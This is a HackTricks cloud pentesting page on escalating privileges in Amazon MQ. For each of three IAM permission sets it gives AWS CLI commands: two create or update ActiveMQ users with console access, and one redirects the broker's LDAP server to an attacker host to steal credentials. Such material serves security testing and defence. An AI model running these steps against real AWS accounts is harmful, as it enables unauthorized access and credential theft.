AWS - MQ Privesc

Reading time: 2 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

MQ

For more information about MQ check:

AWS - MQ Enum

mq:ListBrokers, mq:CreateUser

With those permissions you can create a new user in an ActimeMQ broker (this doesn't work in RabbitMQ):

bash
aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Potential Impact: Access sensitive info navigating through ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

With those permissions you can create a new user in an ActimeMQ broker (this doesn't work in RabbitMQ):

bash
aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Potential Impact: Access sensitive info navigating through ActiveMQ

mq:ListBrokers, mq:UpdateBroker

If a broker is using LDAP for authorization with ActiveMQ. It's possible to change the configuration of the LDAP server used to one controlled by the attacker. This way the attacker will be able to steal all the credentials being sent through LDAP.

bash
aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

If you could somehow find the original credentials used by ActiveMQ you could perform a MitM, steal the creds, used them in the original server, and send the response (maybe just reusing the crendetials stolen you could do this).

Potential Impact: Steal ActiveMQ credentials

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks